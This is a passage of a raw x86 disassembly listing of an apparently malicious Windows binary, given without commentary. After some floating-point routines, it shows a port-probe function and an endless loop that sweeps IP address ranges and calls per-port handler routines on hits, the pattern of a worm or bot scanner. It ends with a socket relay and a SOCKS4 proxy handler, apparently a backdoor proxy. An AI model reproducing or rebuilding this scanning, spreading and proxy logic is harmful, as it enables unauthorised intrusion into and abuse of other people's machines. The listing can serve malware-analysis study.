		mov	[esp+20h+var_4], edx

loc_413BCF:				; CODE XREF: sub_413A67+B8j
		cmp	dword_4376DC, 0
		jz	loc_413D62
		and	esi, 308031Fh
		mov	edi, esi
		stmxcsr	[esp+20h+var_8]
		mov	eax, [esp+20h+var_8]
		xor	esi, esi
		test	al, al
		jns	short loc_413BF6
		push	10h
		pop	esi

loc_413BF6:				; CODE XREF: sub_413A67+18Aj
		test	ax, 200h
		jz	short loc_413BFF
		or	esi, 8

loc_413BFF:				; CODE XREF: sub_413A67+193j
		test	ax, 400h
		jz	short loc_413C08
		or	esi, 4

loc_413C08:				; CODE XREF: sub_413A67+19Cj
		test	ax, 800h
		jz	short loc_413C11
		or	esi, 2

loc_413C11:				; CODE XREF: sub_413A67+1A5j
		test	ax, 1000h
		jz	short loc_413C1A
		or	esi, 1

loc_413C1A:				; CODE XREF: sub_413A67+1AEj
		test	ax, 100h
		jz	short loc_413C26
		or	esi, 80000h

loc_413C26:				; CODE XREF: sub_413A67+1B7j
		mov	ecx, eax
		mov	ebp, 6000h
		and	ecx, ebp
		jz	short loc_413C5B
		cmp	ecx, 2000h
		jz	short loc_413C55
		cmp	ecx, 4000h
		jz	short loc_413C4D
		cmp	ecx, ebp
		jnz	short loc_413C5B
		or	esi, 300h
		jmp	short loc_413C5B
; ---------------------------------------------------------------------------

loc_413C4D:				; CODE XREF: sub_413A67+1D8j
		or	esi, 200h
		jmp	short loc_413C5B
; ---------------------------------------------------------------------------

loc_413C55:				; CODE XREF: sub_413A67+1D0j
		or	esi, 100h

loc_413C5B:				; CODE XREF: sub_413A67+1C8j
					; sub_413A67+1DCj ...
		mov	ebx, 8040h
		and	eax, ebx
		sub	eax, 40h
		jz	short loc_413C83
		sub	eax, 7FC0h
		jz	short loc_413C7B
		sub	eax, 40h
		jnz	short loc_413C89
		or	esi, 1000000h
		jmp	short loc_413C89
; ---------------------------------------------------------------------------

loc_413C7B:				; CODE XREF: sub_413A67+205j
		or	esi, 3000000h
		jmp	short loc_413C89
; ---------------------------------------------------------------------------

loc_413C83:				; CODE XREF: sub_413A67+1FEj
		or	esi, 2000000h

loc_413C89:				; CODE XREF: sub_413A67+20Aj
					; sub_413A67+212j ...
		mov	edx, edi
		and	edi, [esp+20h+arg_0]
		not	edx
		and	edx, esi
		or	edx, edi
		cmp	edx, esi
		jnz	short loc_413CA0
		mov	eax, esi
		jmp	loc_413D4B
; ---------------------------------------------------------------------------

loc_413CA0:				; CODE XREF: sub_413A67+230j
		call	sub_4139C7
		push	eax
		mov	[esp+24h+arg_4], eax
		call	sub_41069A
		pop	ecx
		stmxcsr	[esp+20h+arg_4]
		mov	eax, [esp+20h+arg_4]
		xor	edx, edx
		test	al, al
		jns	short loc_413CC2
		push	10h
		pop	edx

loc_413CC2:				; CODE XREF: sub_413A67+256j
		mov	edi, 200h
		test	eax, edi
		jz	short loc_413CCE
		or	edx, 8

loc_413CCE:				; CODE XREF: sub_413A67+262j
		test	ax, 400h
		jz	short loc_413CD7
		or	edx, 4

loc_413CD7:				; CODE XREF: sub_413A67+26Bj
		test	ax, 800h
		jz	short loc_413CE0
		or	edx, 2

loc_413CE0:				; CODE XREF: sub_413A67+274j
		test	ax, 1000h
		jz	short loc_413CE9
		or	edx, 1

loc_413CE9:				; CODE XREF: sub_413A67+27Dj
		mov	esi, 100h
		test	eax, esi
		jz	short loc_413CF8
		or	edx, 80000h

loc_413CF8:				; CODE XREF: sub_413A67+289j
		mov	ecx, eax
		and	ecx, ebp
		jz	short loc_413D20
		cmp	ecx, 2000h
		jz	short loc_413D1E
		cmp	ecx, 4000h
		jz	short loc_413D1A
		cmp	ecx, ebp
		jnz	short loc_413D20
		or	edx, 300h
		jmp	short loc_413D20
; ---------------------------------------------------------------------------

loc_413D1A:				; CODE XREF: sub_413A67+2A5j
		or	edx, edi
		jmp	short loc_413D20
; ---------------------------------------------------------------------------

loc_413D1E:				; CODE XREF: sub_413A67+29Dj
		or	edx, esi

loc_413D20:				; CODE XREF: sub_413A67+295j
					; sub_413A67+2A9j ...
		and	eax, ebx
		sub	eax, 40h
		jz	short loc_413D43
		sub	eax, 7FC0h
		jz	short loc_413D3B
		sub	eax, 40h
		jnz	short loc_413D49
		or	edx, 1000000h
		jmp	short loc_413D49
; ---------------------------------------------------------------------------

loc_413D3B:				; CODE XREF: sub_413A67+2C5j
		or	edx, 3000000h
		jmp	short loc_413D49
; ---------------------------------------------------------------------------

loc_413D43:				; CODE XREF: sub_413A67+2BEj
		or	edx, 2000000h

loc_413D49:				; CODE XREF: sub_413A67+2CAj
					; sub_413A67+2D2j ...
		mov	eax, edx

loc_413D4B:				; CODE XREF: sub_413A67+234j
		mov	ecx, [esp+20h+var_4]
		mov	edx, eax
		xor	edx, ecx
		or	eax, ecx
		test	edx, 8031Fh
		jz	short loc_413D62
		or	eax, 80000000h

loc_413D62:				; CODE XREF: sub_413A67+16Fj
					; sub_413A67+2F4j
		pop	edi
		pop	esi
		pop	ebp
		pop	ebx
		add	esp, 10h
		retn
sub_413A67	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_413D6A	proc near		; CODE XREF: sub_4129AD+326p

var_18		= dword	ptr -18h
var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		sub	esp, 18h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		mov	eax, [ebp+arg_8]
		push	ebx
		push	esi
		xor	esi, esi
		cmp	[ebp+arg_4], esi
		push	edi
		mov	[ebp+var_18], 404Eh
		mov	[eax], esi
		mov	[eax+4], esi
		mov	[eax+8], esi
		jbe	loc_413EE0

loc_413D9A:				; CODE XREF: sub_413D6A+146j
		mov	edx, [eax]
		mov	ebx, [eax+4]
		mov	esi, eax
		lea	edi, [ebp+var_10]
		movsd
		movsd
		movsd
		mov	ecx, edx
		shr	ecx, 1Fh
		lea	edi, [edx+edx]
		lea	edx, [ebx+ebx]
		or	edx, ecx
		mov	ecx, [eax+8]
		mov	esi, ebx
		shr	esi, 1Fh
		add	ecx, ecx
		or	ecx, esi
		mov	[ebp+var_14], edi
		mov	esi, edi
		and	[ebp+var_14], 0
		mov	ebx, edx
		shr	ebx, 1Fh
		add	ecx, ecx
		shr	edi, 1Fh
		or	ecx, ebx
		mov	ebx, [ebp+var_10]
		add	esi, esi
		add	edx, edx
		or	edx, edi
		lea	edi, [esi+ebx]
		cmp	edi, esi
		mov	[eax], esi
		mov	[eax+4], edx
		mov	[eax+8], ecx
		jb	short loc_413DF1
		cmp	edi, ebx
		jnb	short loc_413DF8

loc_413DF1:				; CODE XREF: sub_413D6A+81j
		mov	[ebp+var_14], 1

loc_413DF8:				; CODE XREF: sub_413D6A+85j
		xor	ebx, ebx
		cmp	[ebp+var_14], ebx
		mov	[eax], edi
		jz	short loc_413E1B
		lea	esi, [edx+1]
		cmp	esi, edx
		jb	short loc_413E0D
		cmp	esi, 1
		jnb	short loc_413E10

loc_413E0D:				; CODE XREF: sub_413D6A+9Cj
		xor	ebx, ebx
		inc	ebx

loc_413E10:				; CODE XREF: sub_413D6A+A1j
		test	ebx, ebx
		mov	[eax+4], esi
		jz	short loc_413E1B
		inc	ecx
		mov	[eax+8], ecx

loc_413E1B:				; CODE XREF: sub_413D6A+95j
					; sub_413D6A+ABj
		mov	ecx, [eax+4]
		mov	edx, [ebp+var_C]
		lea	ebx, [ecx+edx]
		xor	esi, esi
		cmp	ebx, ecx
		jb	short loc_413E2E
		cmp	ebx, edx
		jnb	short loc_413E31

loc_413E2E:				; CODE XREF: sub_413D6A+BEj
		xor	esi, esi
		inc	esi

loc_413E31:				; CODE XREF: sub_413D6A+C2j
		test	esi, esi
		mov	[eax+4], ebx
		jz	short loc_413E3B
		inc	dword ptr [eax+8]

loc_413E3B:				; CODE XREF: sub_413D6A+CCj
		mov	ecx, [ebp+var_8]
		add	[eax+8], ecx
		and	[ebp+var_14], 0
		lea	ecx, [edi+edi]
		mov	edx, edi
		shr	edx, 1Fh
		lea	edi, [ebx+ebx]
		or	edi, edx
		mov	edx, [eax+8]
		mov	esi, ebx
		shr	esi, 1Fh
		lea	ebx, [edx+edx]
		mov	edx, [ebp+arg_0]
		or	ebx, esi
		mov	[eax], ecx
		mov	[eax+4], edi
		mov	[eax+8], ebx
		movsx	edx, byte ptr [edx]
		lea	esi, [ecx+edx]
		cmp	esi, ecx
		mov	[ebp+var_10], edx
		jb	short loc_413E7B
		cmp	esi, edx
		jnb	short loc_413E82

loc_413E7B:				; CODE XREF: sub_413D6A+10Bj
		mov	[ebp+var_14], 1

loc_413E82:				; CODE XREF: sub_413D6A+10Fj
		cmp	[ebp+var_14], 0
		mov	[eax], esi
		jz	short loc_413EA6
		lea	ecx, [edi+1]
		xor	edx, edx
		cmp	ecx, edi
		jb	short loc_413E98
		cmp	ecx, 1
		jnb	short loc_413E9B

loc_413E98:				; CODE XREF: sub_413D6A+127j
		xor	edx, edx
		inc	edx

loc_413E9B:				; CODE XREF: sub_413D6A+12Cj
		test	edx, edx
		mov	[eax+4], ecx
		jz	short loc_413EA6
		inc	ebx
		mov	[eax+8], ebx

loc_413EA6:				; CODE XREF: sub_413D6A+11Ej
					; sub_413D6A+136j
		dec	[ebp+arg_4]
		inc	[ebp+arg_0]
		cmp	[ebp+arg_4], 0
		ja	loc_413D9A
		xor	esi, esi
		jmp	short loc_413EE0
; ---------------------------------------------------------------------------

loc_413EBA:				; CODE XREF: sub_413D6A+179j
		mov	ecx, [eax+4]
		mov	edx, ecx
		shr	edx, 10h
		mov	[eax+8], edx
		mov	edx, [eax]
		mov	edi, edx
		shl	ecx, 10h
		shr	edi, 10h
		or	ecx, edi
		shl	edx, 10h
		add	[ebp+var_18], 0FFF0h
		mov	[eax+4], ecx
		mov	[eax], edx

loc_413EE0:				; CODE XREF: sub_413D6A+2Aj
					; sub_413D6A+14Ej
		cmp	[eax+8], esi
		jz	short loc_413EBA
		mov	ebx, 8000h
		test	[eax+8], ebx
		jnz	short loc_413F1F

loc_413EEF:				; CODE XREF: sub_413D6A+1B3j
		mov	esi, [eax]
		mov	edi, [eax+4]
		add	[ebp+var_18], 0FFFFh
		mov	ecx, esi
		add	esi, esi
		shr	ecx, 1Fh
		mov	[eax], esi
		lea	esi, [edi+edi]
		or	esi, ecx
		mov	ecx, [eax+8]
		mov	edx, edi
		shr	edx, 1Fh
		add	ecx, ecx
		or	ecx, edx
		test	ecx, ebx
		mov	[eax+4], esi
		mov	[eax+8], ecx
		jz	short loc_413EEF

loc_413F1F:				; CODE XREF: sub_413D6A+183j
		mov	cx, word ptr [ebp+var_18]
		mov	[eax+0Ah], cx
		mov	ecx, [ebp+var_4]
		pop	edi
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402C9E
		leave
		retn
sub_413D6A	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_413F36	proc near		; CODE XREF: sub_4047FC+24p
					; sub_408CAA+10p ...
		jmp	ds:off_41E1B0
sub_413F36	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_413F3C	proc near		; CODE XREF: sub_413FED+14Bp
					; sub_413FED+263p ...

var_128		= dword	ptr -128h
var_124		= dword	ptr -124h
var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
var_18		= dword	ptr -18h
var_14		= word ptr -14h
var_12		= word ptr -12h
var_10		= dword	ptr -10h
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 128h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		push	esi
		push	edi
		xor	edi, edi
		push	6
		inc	edi
		push	edi
		push	2
		mov	[ebp+var_18], edi
		call	ds:dword_41E220	; socket
		mov	esi, eax
		cmp	esi, 0FFFFFFFFh
		jnz	short loc_413F6D
		xor	al, al
		jmp	short loc_413FDF
; ---------------------------------------------------------------------------

loc_413F6D:				; CODE XREF: sub_413F3C+2Bj
		push	[ebp+arg_4]
		call	ds:dword_41E270	; htons
		mov	[ebp+var_12], ax
		mov	eax, [ebp+arg_0]
		mov	[ebp+var_10], eax
		lea	eax, [ebp+var_18]
		push	eax
		push	8004667Eh
		push	esi
		mov	[ebp+var_14], 2
		call	ds:dword_41E268	; ioctlsocket
		and	[ebp+var_1C], 0
		push	10h
		lea	eax, [ebp+var_14]
		push	eax
		push	esi
		mov	[ebp+var_20], 5
		mov	[ebp+var_124], esi
		mov	[ebp+var_128], edi
		call	ds:dword_41E23C	; connect
		lea	eax, [ebp+var_20]
		push	eax
		push	0
		lea	eax, [ebp+var_128]
		push	eax
		push	0
		push	0
		call	ds:dword_41E254	; select
		push	esi
		mov	edi, eax
		call	ds:dword_41E280	; closesocket
		test	edi, edi
		setnle	al

loc_413FDF:				; CODE XREF: sub_413F3C+2Fj
		mov	ecx, [ebp+var_4]
		pop	edi
		xor	ecx, ebp
		pop	esi
		call	sub_402C9E
		leave
		retn
sub_413F3C	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: noreturn bp-based	frame


sub_413FED	proc near		; DATA XREF: .text:00402987o

var_25C		= dword	ptr -25Ch
var_258		= dword	ptr -258h
var_254		= dword	ptr -254h
var_250		= dword	ptr -250h
var_24C		= dword	ptr -24Ch
var_248		= dword	ptr -248h
var_244		= dword	ptr -244h
var_240		= byte ptr -240h
var_140		= dword	ptr -140h
var_13C		= dword	ptr -13Ch
var_138		= dword	ptr -138h
var_134		= byte ptr -134h
var_130		= byte ptr -130h
var_30		= byte ptr -30h
var_20		= byte ptr -20h
var_1E		= byte ptr -1Eh
var_1C		= dword	ptr -1Ch
var_18		= dword	ptr -18h
var_14		= dword	ptr -14h
var_4		= dword	ptr -4
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		and	esp, 0FFFFFFF8h
		sub	esp, 25Ch
		mov	eax, dword_424064
		xor	eax, esp
		mov	[esp+25Ch+var_4], eax
		push	ebx
		push	esi
		mov	esi, [ebp+arg_0]
		push	edi
		push	49h
		pop	ecx
		lea	edi, [esp+268h+var_130]
		rep movsd

loc_414019:				; CODE XREF: sub_413FED+528j
					; sub_413FED+539j
		lea	eax, [esp+268h+var_250]
		push	eax
		lea	eax, [esp+26Ch+var_254]
		push	eax
		lea	eax, [esp+270h+var_258]
		push	eax
		lea	eax, [esp+274h+var_25C]
		push	eax
		or	edi, 0FFFFFFFFh
		lea	eax, [esp+278h+var_30]
		push	offset dword_41FF1C
		push	eax
		mov	[esp+280h+var_25C], edi
		mov	[esp+280h+var_258], edi
		mov	[esp+280h+var_254], edi
		mov	[esp+280h+var_250], edi
		call	sub_403B72
		add	esp, 18h
		cmp	[esp+268h+var_1E], 0
		jz	short loc_4140A7
		cmp	[esp+268h+var_25C], edi
		mov	esi, 0FEh
		jnz	short loc_414077
		mov	eax, esi
		xor	ebx, ebx
		call	sub_419F47
		mov	[esp+268h+var_25C], eax

loc_414077:				; CODE XREF: sub_413FED+7Bj
		cmp	[esp+268h+var_258], edi
		jnz	short loc_41408A
		mov	eax, esi
		xor	ebx, ebx
		call	sub_419F47
		mov	[esp+268h+var_258], eax

loc_41408A:				; CODE XREF: sub_413FED+8Ej
		cmp	[esp+268h+var_254], edi
		jnz	short loc_41409D
		mov	eax, esi
		xor	ebx, ebx
		call	sub_419F47
		mov	[esp+268h+var_254], eax

loc_41409D:				; CODE XREF: sub_413FED+A1j
		mov	eax, [esp+268h+var_250]
		cmp	eax, edi
		jnz	short loc_4140F9
		jmp	short loc_4140D2
; ---------------------------------------------------------------------------

loc_4140A7:				; CODE XREF: sub_413FED+70j
		mov	eax, [esp+268h+var_18]
		sub	eax, 0
		jz	short loc_4140E1
		dec	eax
		jz	short loc_4140C0
		dec	eax
		jnz	short loc_4140F5
		mov	eax, 0FEh
		jmp	short loc_4140D4
; ---------------------------------------------------------------------------

loc_4140C0:				; CODE XREF: sub_413FED+C7j
		mov	esi, 0FEh

loc_4140C5:				; CODE XREF: sub_413FED+106j
		mov	eax, esi
		xor	ebx, ebx
		call	sub_419F47
		mov	[esp+268h+var_254], eax

loc_4140D2:				; CODE XREF: sub_413FED+B8j
		mov	eax, esi

loc_4140D4:				; CODE XREF: sub_413FED+D1j
		xor	ebx, ebx
		call	sub_419F47
		mov	[esp+268h+var_250], eax
		jmp	short loc_4140F9
; ---------------------------------------------------------------------------

loc_4140E1:				; CODE XREF: sub_413FED+C4j
		mov	esi, 0FEh
		mov	eax, esi
		xor	ebx, ebx
		call	sub_419F47
		mov	[esp+268h+var_258], eax
		jmp	short loc_4140C5
; ---------------------------------------------------------------------------

loc_4140F5:				; CODE XREF: sub_413FED+CAj
		mov	eax, [esp+268h+var_250]

loc_4140F9:				; CODE XREF: sub_413FED+B6j
					; sub_413FED+F2j
		shl	eax, 8
		add	eax, [esp+268h+var_254]
		shl	eax, 8
		add	eax, [esp+268h+var_258]
		shl	eax, 8
		add	eax, [esp+268h+var_25C]
		mov	[esp+268h+var_14], eax
		mov	eax, [esp+268h+var_1C]
		cmp	eax, edi
		jnz	loc_41431C
		xor	ebx, ebx
		mov	[esp+268h+var_248], ebx
		mov	eax, offset dword_425548

loc_41412F:				; CODE XREF: sub_413FED+169j
		push	dword ptr [eax]
		push	[esp+26Ch+var_14]
		call	sub_413F3C
		test	al, al
		pop	ecx
		pop	ecx
		jnz	short loc_41415D
		inc	ebx
		mov	eax, ebx
		imul	eax, 2Ch
		lea	eax, dword_425548[eax]
		cmp	dword ptr [eax], 0
		mov	[esp+268h+var_248], ebx
		jnz	short loc_41412F
		jmp	loc_414506
; ---------------------------------------------------------------------------

loc_41415D:				; CODE XREF: sub_413FED+154j
		push	110h
		lea	eax, [esp+26Ch+var_240]
		push	0
		push	eax
		call	sub_408130
		add	esp, 0Ch
		lea	eax, [esp+268h+var_130]
		push	eax
		push	offset byte_41FF28
		lea	eax, [esp+270h+var_240]
		push	0FFh
		push	eax
		call	sub_40307C
		lea	eax, [esp+278h+var_240]
		add	esp, 10h
		lea	esi, [eax+1]

loc_414197:				; CODE XREF: sub_413FED+1AFj
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_414197
		sub	eax, esi
		mov	[esp+eax+268h+var_240],	cl
		mov	eax, [esp+268h+var_14]
		mov	[esp+268h+var_140], ebx
		imul	ebx, 2Ch
		mov	[esp+268h+var_13C], eax
		mov	eax, dword_425548[ebx]
		sub	esp, 110h
		mov	[esp+378h+var_138], eax
		mov	al, [esp+378h+var_20]
		push	44h
		pop	ecx
		mov	[esp+378h+var_134], al
		lea	esi, [esp+378h+var_240]
		mov	edi, esp
		rep movsd
		call	off_425550[ebx]
		mov	esi, [esp+378h+var_250]
		shl	esi, 8
		add	esi, [esp+378h+var_254]
		add	esp, 110h
		shl	esi, 8
		add	esi, [esp+268h+var_258]
		mov	[esp+268h+var_24C], 100h
		shl	esi, 8
		add	esi, [esp+268h+var_25C]
		mov	[esp+268h+var_244], esi

loc_414222:				; CODE XREF: sub_413FED+324j
		mov	eax, [esp+268h+var_24C]
		mov	ecx, [esp+268h+var_254]
		add	eax, ecx
		shl	eax, 8
		add	eax, [esp+268h+var_258]
		shl	eax, 8
		add	eax, [esp+268h+var_25C]
		cmp	eax, esi
		mov	[esp+268h+var_14], eax
		jz	loc_414301
		push	dword_425548[ebx]
		push	eax
		call	sub_413F3C
		test	al, al
		pop	ecx
		pop	ecx
		jz	loc_414301
		push	110h
		lea	eax, [esp+26Ch+var_240]
		push	0
		push	eax
		call	sub_408130
		add	esp, 0Ch
		lea	eax, [esp+268h+var_130]
		push	eax
		push	offset byte_41FF2C
		lea	eax, [esp+270h+var_240]
		push	0FFh
		push	eax
		call	sub_40307C
		lea	eax, [esp+278h+var_240]
		add	esp, 10h
		lea	esi, [eax+1]

loc_414299:				; CODE XREF: sub_413FED+2B1j
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_414299
		sub	eax, esi
		mov	[esp+eax+268h+var_240],	cl
		mov	eax, [esp+268h+var_14]
		mov	[esp+268h+var_13C], eax
		mov	eax, [esp+268h+var_248]
		mov	[esp+268h+var_140], eax
		mov	eax, dword_425548[ebx]
		sub	esp, 110h
		mov	[esp+378h+var_138], eax
		mov	al, [esp+378h+var_20]
		push	44h
		pop	ecx
		mov	[esp+378h+var_134], al
		lea	esi, [esp+378h+var_240]
		mov	edi, esp
		rep movsd
		call	off_425550[ebx]
		mov	esi, [esp+378h+var_244]
		add	esp, 110h

loc_414301:				; CODE XREF: sub_413FED+256j
					; sub_413FED+26Cj
		add	[esp+268h+var_24C], 100h
		cmp	[esp+268h+var_24C], 0FE00h
		jle	loc_414222
		jmp	loc_414501
; ---------------------------------------------------------------------------

loc_41431C:				; CODE XREF: sub_413FED+131j
		imul	eax, 2Ch
		push	dword_425548[eax]
		push	[esp+26Ch+var_14]
		call	sub_413F3C
		test	al, al
		pop	ecx
		pop	ecx
		jz	loc_414506
		push	110h
		lea	eax, [esp+26Ch+var_240]
		push	0
		push	eax
		call	sub_408130
		add	esp, 0Ch
		lea	eax, [esp+268h+var_130]
		push	eax
		push	offset dword_41FF30
		lea	eax, [esp+270h+var_240]
		push	0FFh
		push	eax
		call	sub_40307C
		lea	eax, [esp+278h+var_240]
		add	esp, 10h
		lea	ecx, [eax+1]

loc_414375:				; CODE XREF: sub_413FED+38Dj
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_414375
		sub	eax, ecx
		mov	[esp+eax+268h+var_240],	dl
		mov	eax, [esp+268h+var_14]
		mov	[esp+268h+var_13C], eax
		mov	eax, [esp+268h+var_1C]
		mov	[esp+268h+var_140], eax
		imul	eax, 2Ch
		mov	ecx, dword_425548[eax]
		mov	[esp+268h+var_138], ecx
		mov	cl, [esp+268h+var_20]
		sub	esp, 110h
		mov	[esp+378h+var_134], cl
		push	44h
		pop	ecx
		lea	esi, [esp+378h+var_240]
		mov	edi, esp
		rep movsd
		call	off_425550[eax]
		mov	ebx, [esp+378h+var_250]
		shl	ebx, 8
		add	ebx, [esp+378h+var_254]
		add	esp, 110h
		shl	ebx, 8
		add	ebx, [esp+268h+var_258]
		mov	[esp+268h+var_24C], 100h
		shl	ebx, 8
		add	ebx, [esp+268h+var_25C]

loc_414403:				; CODE XREF: sub_413FED+50Ej
		mov	eax, [esp+268h+var_24C]
		mov	ecx, [esp+268h+var_254]
		add	eax, ecx
		shl	eax, 8
		add	eax, [esp+268h+var_258]
		shl	eax, 8
		add	eax, [esp+268h+var_25C]
		cmp	eax, ebx
		mov	[esp+268h+var_14], eax
		jz	loc_4144EB
		mov	ecx, [esp+268h+var_1C]
		imul	ecx, 2Ch
		push	dword_425548[ecx]
		push	eax
		call	sub_413F3C
		test	al, al
		pop	ecx
		pop	ecx
		jz	loc_4144EB
		push	110h
		lea	eax, [esp+26Ch+var_240]
		push	0
		push	eax
		call	sub_408130
		add	esp, 0Ch
		lea	eax, [esp+268h+var_130]
		push	eax
		push	offset dword_41FF34
		lea	eax, [esp+270h+var_240]
		push	0FFh
		push	eax
		call	sub_40307C
		lea	eax, [esp+278h+var_240]
		add	esp, 10h
		lea	esi, [eax+1]

loc_414484:				; CODE XREF: sub_413FED+49Cj
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_414484
		sub	eax, esi
		mov	[esp+eax+268h+var_240],	cl
		mov	eax, [esp+268h+var_14]
		mov	[esp+268h+var_13C], eax
		mov	eax, [esp+268h+var_1C]
		mov	[esp+268h+var_140], eax
		imul	eax, 2Ch
		mov	ecx, dword_425548[eax]
		mov	[esp+268h+var_138], ecx
		mov	cl, [esp+268h+var_20]
		sub	esp, 110h
		mov	[esp+378h+var_134], cl
		push	44h
		pop	ecx
		lea	esi, [esp+378h+var_240]
		mov	edi, esp
		rep movsd
		call	off_425550[eax]
		add	esp, 110h

loc_4144EB:				; CODE XREF: sub_413FED+437j
					; sub_413FED+457j
		add	[esp+268h+var_24C], 100h
		cmp	[esp+268h+var_24C], 0FE00h
		jle	loc_414403

loc_414501:				; CODE XREF: sub_413FED+32Aj
		call	sub_419F7B

loc_414506:				; CODE XREF: sub_413FED+16Bj
					; sub_413FED+348j
		push	64h
		call	ds:off_41E0F8
		cmp	byte_428D20, 0
		jnz	loc_414019
		push	2710h
		call	ds:off_41E0F8
		jmp	loc_414019
sub_413FED	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41452B	proc near		; CODE XREF: sub_41463A+144p

var_508		= dword	ptr -508h
var_504		= dword	ptr -504h
var_500		= dword	ptr -500h
var_404		= byte ptr -404h
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 508h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		push	ebx
		mov	ebx, ds:dword_41E26C
		push	esi
		push	edi
		xor	edi, edi
		mov	esi, 400h

loc_41454E:				; CODE XREF: sub_41452B+CCj
					; sub_41452B+FAj
		mov	eax, [ebp+arg_4]
		xor	ecx, ecx
		inc	ecx
		mov	[ebp+var_504], eax
		mov	[ebp+var_508], ecx
		xor	eax, eax

loc_414562:				; CODE XREF: sub_41452B+46j
		mov	edx, [ebp+arg_0]
		cmp	[ebp+eax*4+var_504], edx
		jz	short loc_414573
		inc	eax
		cmp	eax, ecx
		jb	short loc_414562

loc_414573:				; CODE XREF: sub_41452B+41j
		cmp	eax, ecx
		jnz	short loc_414587
		mov	[ebp+var_500], edx
		mov	[ebp+var_508], 2

loc_414587:				; CODE XREF: sub_41452B+4Aj
		push	esi
		lea	eax, [ebp+var_404]
		push	edi
		push	eax
		call	sub_408130
		add	esp, 0Ch
		push	edi
		push	edi
		push	edi
		lea	eax, [ebp+var_508]
		push	eax
		push	edi
		call	ds:dword_41E254	; select
		lea	eax, [ebp+var_508]
		push	eax
		push	[ebp+arg_4]
		call	sub_402BCA	; __WSAFDIsSet
		test	eax, eax
		jz	short loc_4145E6
		push	edi
		push	esi
		lea	eax, [ebp+var_404]
		push	eax
		push	[ebp+arg_4]
		call	ebx	; recv
		cmp	eax, 0FFFFFFFFh
		jz	short loc_41462B
		push	edi
		push	eax
		lea	eax, [ebp+var_404]
		push	eax
		push	[ebp+arg_0]
		call	ds:dword_41E228	; send
		cmp	eax, 0FFFFFFFFh
		jz	short loc_41462B

loc_4145E6:				; CODE XREF: sub_41452B+8Fj
		lea	eax, [ebp+var_508]
		push	eax
		push	[ebp+arg_0]
		call	sub_402BCA	; __WSAFDIsSet
		test	eax, eax
		jz	loc_41454E
		push	edi
		push	esi
		lea	eax, [ebp+var_404]
		push	eax
		push	[ebp+arg_0]
		call	ebx	; recv
		cmp	eax, 0FFFFFFFFh
		jz	short loc_41462B
		push	edi
		push	eax
		lea	eax, [ebp+var_404]
		push	eax
		push	[ebp+arg_4]
		call	ds:dword_41E228	; send
		cmp	eax, 0FFFFFFFFh
		jnz	loc_41454E

loc_41462B:				; CODE XREF: sub_41452B+A2j
					; sub_41452B+B9j ...
		mov	ecx, [ebp+var_4]
		pop	edi
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402C9E
		leave
		retn
sub_41452B	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41463A	proc near		; DATA XREF: sub_4147B2+189o

var_530		= dword	ptr -530h
var_52C		= dword	ptr -52Ch
var_528		= dword	ptr -528h
var_524		= dword	ptr -524h
var_420		= word ptr -420h
var_41E		= word ptr -41Eh
var_41C		= dword	ptr -41Ch
var_414		= byte ptr -414h
var_410		= byte ptr -410h
var_40F		= byte ptr -40Fh
var_40E		= word ptr -40Eh
var_40C		= dword	ptr -40Ch
var_404		= byte ptr -404h
var_403		= byte ptr -403h
var_3FC		= byte ptr -3FCh
var_4		= dword	ptr -4
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		and	esp, 0FFFFFFF8h
		sub	esp, 534h
		mov	eax, dword_424064
		xor	eax, esp
		mov	[esp+534h+var_4], eax
		push	ebx
		push	esi
		mov	esi, [ebp+arg_0]
		push	edi
		xor	ebx, ebx
		lea	eax, [esp+540h+var_530]
		push	eax
		push	ebx
		push	ebx
		lea	eax, [esp+54Ch+var_528]
		push	eax
		push	ebx
		mov	[esp+554h+var_530], 14h
		mov	[esp+554h+var_52C], ebx
		mov	[esp+554h+var_524], esi
		mov	[esp+554h+var_528], 1
		call	ds:dword_41E254	; select
		test	eax, eax
		jz	loc_414785
		push	ebx
		push	408h
		lea	eax, [esp+548h+var_410]
		push	eax
		push	esi
		call	ds:dword_41E26C	; recv
		test	eax, eax
		jle	loc_414785
		cmp	[esp+540h+var_410], 4
		jnz	loc_414785
		cmp	[esp+540h+var_40F], 1
		jnz	loc_414785
		xor	eax, eax
		lea	edi, [esp+540h+var_420]
		stosd
		stosd
		stosd
		stosd
		mov	ax, [esp+540h+var_40E]
		push	6
		mov	[esp+544h+var_41E], ax
		mov	eax, [esp+544h+var_40C]
		push	1
		push	2
		mov	[esp+54Ch+var_420], 2
		mov	[esp+54Ch+var_41C], eax
		call	ds:dword_41E220	; socket
		mov	edi, eax
		push	10h
		lea	eax, [esp+538h+var_414]
		push	eax
		push	edi
		call	ds:dword_41E23C	; connect
		push	400h
		cmp	eax, 0FFFFFFFFh
		push	ebx
		lea	eax, [esp+53Ch+var_3FC]
		mov	[esp+53Ch+var_404], bl
		push	eax
		jnz	short loc_41475A
		mov	[esp+540h+var_403], 5Bh
